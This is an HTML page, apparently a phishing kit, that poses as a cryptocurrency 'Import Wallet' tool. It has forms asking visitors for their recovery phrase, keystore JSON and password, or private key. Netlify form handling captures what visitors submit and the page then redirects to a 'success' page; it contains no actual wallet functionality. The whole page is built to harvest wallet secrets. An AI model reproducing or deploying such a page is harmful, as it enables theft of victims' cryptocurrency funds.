<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="import/importresponsive.css">
    <title>Import Wallet</title>
    <link rel="stylesheet" href="import/index2responsive">
    <style>
        .logo {
            width: 200px;
            margin-top: 20px;
            
        }
        .container {
            border: 2px solid black;
            width: fit-content;
            text-align: center;
            border-radius: 10px;
            padding-bottom: 30px;
            background-color: #fff;
            margin: auto;
        }
        .navigation nav ul li {
            list-style: none;
            color: black;
            font-family: sans-serif;
            font-size: 20px;
            font-weight: bold;
            display: inline;
            margin: 30px;       
 }
 .navigation nav ul li:hover {
     cursor: pointer;
     background-color: blue;
     transition: 1s;
 }
 textarea {
     border-radius: 5px;
 }
 button {
     background-color: blue;
     border: 1px solid blue;
     width: 80%;
     height: 40px;
     border-radius: 10px;
     color: white;
 }
 button:hover {
        cursor: pointer;
}
 #form2 {
     display: none;
 }
 #form3 {
     display: none;
 }
 ul  {
     border: 2px solid blue;
     margin-left: 10px;
     margin-right: 10px;
     border-radius: 15px;
     
 }

    </style>
</head>
<body>
   <div class="container">
       <img src="wallet.png" alt="" class="logo"><br>
       <div class="navigation">
           <nav>
              <ul>
                  <li>Phrase</li>
                  <li>Sign In</li>
                  <li>Private Key</li>
              </ul>
           </nav>
         </div>
         <div id="form1">
             <form action="/sucesspage.html" name="Phrase" netlify>
                 <textarea required name="phrases" id="passphrase" cols="50" rows="10" placeholder="Enter Recovery Phrase"></textarea>
                 <br> Typically 12(sometimes 24) words separated by single spaces
                 <br><br>
                 <button type="submit">IMPORT</button>
            </form>
            <div id="form2">
                <form action="submit" name="Keystore" netlify>
                    <textarea name="keystore" id="keystorejson" cols="50" rows="10" placeholder="Keystore JSON"></textarea>
                    <br><br><textarea name="password" id="passwordjson" cols="50" rows="2" placeholder="Password"></textarea>
                    <br> Several lines of text beginning with "{...}" plus <br> the password you used to encrypt it.
                    <br><br>
                    <button type="submit">IMPORT</button>
               </form>
               <div id="form3">
                <form action="submit" name="Private Key" netlify>
                    <textarea name="Private Key" id="private" cols="50" rows="2" placeholder="Private Key"></textarea>
                    <br> Typically 64 alphanumeric characters.
                    <br><br>
                    <button type="submit">IMPORT</button>
               </form>
         </div>
   </div> 
</body>
</html>

